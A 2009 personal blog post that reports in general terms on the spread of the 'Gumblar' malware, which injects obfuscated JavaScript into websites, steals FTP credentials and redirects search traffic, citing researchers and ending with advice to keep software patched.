“Gumblar” web attack spreading fast

A dangerous attack compromising websites is on the prowl. It’s known as “Gumblar”.

A complex new malware attack is setting infection records and raising alarms from security experts.
Known unofficially as ‘Gumblar’ for one of the attack domains, the malware is raising eyebrows and alert levels both for its prolific attack methods and for the danger of its payload.

So how does it work in general terms?

According to researchers, the attack is spreading through site compromises which inject malicious javascript code within components of the site. Upon visiting the infected pages, a victim runs the risk of the javascript attack.

Once a site compromised, the malware alters access credentials and folder permissions to allow an attacker a ‘back door’ for entry to the site even when the user has changed passwords. The malicious javascript code is also altered in slight ways, preventing administrators from automatically searching out and deleting the malicious scripts.

What’s the cause for concern?

First detected in late March, researchers thought that the attacks had been halted by mid-April when Google delisted the offending sites.

However, a new variant on the attack arose early this month and has since enjoyed nearly unprecedented success. Security firm ScanSafe estimates that Gumblar attacks have jumped some 188 per cent over the last week alone, and Sophos credits Gumblar with up to 42 per cent of all malware infections in the last seven days.

“The gross infection rate is exceptional, especially this late in the game,” said Mary Landesman, senior security researcher at ScanSafe.

“Basically, it has been enjoying free reign.”

Why the concern regarding the malware payload?

The malware intercepts web traffic such as Google search requests and redirects it to present fraudulent results, allowing the attackers to collect referral fees and placing the user at risk for further infection.

The malware contains botnet controllers and is programmed to collect all FTP permissions on the infected systems, allowing Gumblar to infect any sites which the user administrates, further fostering the spread to new domains.

To make matters worse for security administrators the creators have altered the scripting and are launching it from a new domain.

Over the weekend, the Chinese web domain used to deliver the malicious code — gumblar.cn — stopped responding, according to Unmask Parasites, a service used to detect malicious code embedded in web pages. The attacks’ malicious payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said in an advisory published on Monday.

“They have slightly modified the script and now inject a new version that loads malicious content from a new domain,” Unmask Parasites said in the advisory.

Changes to the script make it more difficult to identify and stop detection by the Google Chrome browser, Unmask Parasites said.

in early May, as website operators began to clean up their sites, the attackers replaced the original malicious code with dynamically generated and heavily obfuscated JavaScript, meaning that the scripts change from page to page and are difficult for security tools to spot.

It is spread in typical fashion, via vulnerabilities.

The scripts attempt to exploit vulnerabilities in Adobe’s Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer, ScanSafe said.

In other words to avoid being infected by this malware make sure to keep your systems updated so vulnerabilities can’t be exploited.


About brvanlanen

Just a thirty-something guy currently hanging it up in the greater Green Bay area. My post-high school educational background is mainly in the Information Technology field. Specifically I have an A.A.S. in Computer Network Systems and a B.S. in Information Systems Security, both from ITT Technical Institute, in addition to A and MCDST certifications. In my free time I enjoy spending time with my family, cooking and sports. My Christian faith is also important to me as a Missouri-Synod Lutheran and all my children attend a Lutheran grade school. When it comes to political leanings I am a conservative first and foremost which you will discover rather quickly. As for sports I am a huge fan of the Green Bay Packers.

Posted on May 19, 2009, in attacks, Javascript, malware, Security, Web. Bookmark the permalink. Comments Off on “Gumblar” web attack spreading fast.

Comments are closed.

%d bloggers like this: